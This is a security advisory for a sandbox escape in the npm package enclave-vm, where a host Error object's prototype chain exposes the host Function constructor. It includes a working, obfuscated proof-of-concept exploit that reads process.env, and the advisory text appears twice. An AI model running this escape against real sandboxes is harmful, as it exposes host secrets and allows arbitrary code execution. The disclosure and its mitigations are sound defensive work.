Headline
GHSA-7qm7-455j-5p63: enclave-vm Vulnerable to Sandbox Escape via Host Error Prototype Chain
Description
A critical sandbox escape vulnerability exists in enclave-vm v2.3.0 that allows untrusted, sandboxed JavaScript code to execute arbitrary code in the host Node.js runtime.
When a tool invocation fails, enclave-vm exposes a host-side Error object to sandboxed code. This Error object retains its host realm prototype chain, which can be traversed to reach the host Function constructor.
An attacker can intentionally trigger a host error (for example, by invoking a non-existent tool), then climb the prototype chain:
Error instance → Error.prototype → Error constructor → Function constructor
Using the host Function constructor, arbitrary JavaScript can be compiled and executed in the host context, fully bypassing the sandbox and granting access to sensitive resources such as process.env, filesystem, and network.
This breaks enclave-vm’s core security guarantee of isolating untrusted code.
Proof of Concept
// Vector 35: The Host Error Escape
// Purpose: Trigger a Host-side error and traverse its prototype chain
// to reach the Host Function constructor.
const s = (...args) => String.fromCharCode(...args);
const kCon = s(99,111,110,115,116,114,117,99,116,111,114); // "constructor"
const kProto = s(95,95,112,114,111,116,111,95,95); // "__proto__"
const kLookup = s(95,95,108,111,111,107,117,112,71,101,116,116,101,114,95,95);
const kCode = s(114,101,116,117,114,110,32,112,114,111,99,101,115,115,46,101,110,118);
const kPtype = s(112,114,111,116,111,116,121,112,101);
try {
const ObjectProto = Object[kPtype];
const lookup = ObjectProto[kLookup];
const getProtoNative = lookup.call(ObjectProto, kProto);
let hostError;
try {
await callTool('THIS_TOOL_DOES_NOT_EXIST_XYZ', {});
} catch (e) {
hostError = e;
}
const errProto = getProtoNative.call(hostError);
const ErrorCtor = errProto[kCon];
const HostFunc = ErrorCtor[kCon];
const exploitFn = HostFunc(kCode);
return exploitFn();
} catch (e) {
return e.message;
}
Mitigation
- Ensure all Error objects crossing the sandbox boundary are re-created inside the sandbox realm
- Strip or freeze prototype chains of host objects
- Prevent access to host
Functionconstructors - Harden tool error handling to avoid leaking host-native objects
References
- Package: enclave-vm
- Version: v2.6.0
- Ecosystem: npm
- https://www.npmjs.com/package/enclave-vm
A critical sandbox escape vulnerability exists in enclave-vm v2.3.0 that allows untrusted, sandboxed JavaScript code to execute arbitrary code in the host Node.js runtime.
When a tool invocation fails, enclave-vm exposes a host-side Error object to sandboxed code. This Error object retains its host realm prototype chain, which can be traversed to reach the host Function constructor.
An attacker can intentionally trigger a host error (for example, by invoking a non-existent tool), then climb the prototype chain:
Using the host Function constructor, arbitrary JavaScript can be compiled and executed in the host context, fully bypassing the sandbox and granting access to sensitive resources such as process.env, filesystem, and network.
This breaks enclave-vm’s core security guarantee of isolating untrusted code.
// Vector 35: The Host Error Escape // Purpose: Trigger a Host-side error and traverse its prototype chain // to reach the Host Function constructor.
const s = (…args) => String.fromCharCode(…args);
const kCon = s(99,111,110,115,116,114,117,99,116,111,114); // “constructor” const kProto = s(95,95,112,114,111,116,111,95,95); // “__proto__” const kLookup = s(95,95,108,111,111,107,117,112,71,101,116,116,101,114,95,95); const kCode = s(114,101,116,117,114,110,32,112,114,111,99,101,115,115,46,101,110,118); const kPtype = s(112,114,111,116,111,116,121,112,101);
try { const ObjectProto = Object[kPtype]; const lookup = ObjectProto[kLookup]; const getProtoNative = lookup.call(ObjectProto, kProto);
let hostError;
try {
await callTool('THIS\_TOOL\_DOES\_NOT\_EXIST\_XYZ', {});
} catch (e) {
hostError \= e;
}
const errProto \= getProtoNative.call(hostError);
const ErrorCtor \= errProto\[kCon\];
const HostFunc \= ErrorCtor\[kCon\];
const exploitFn \= HostFunc(kCode);
return exploitFn();
} catch (e) { return e.message; }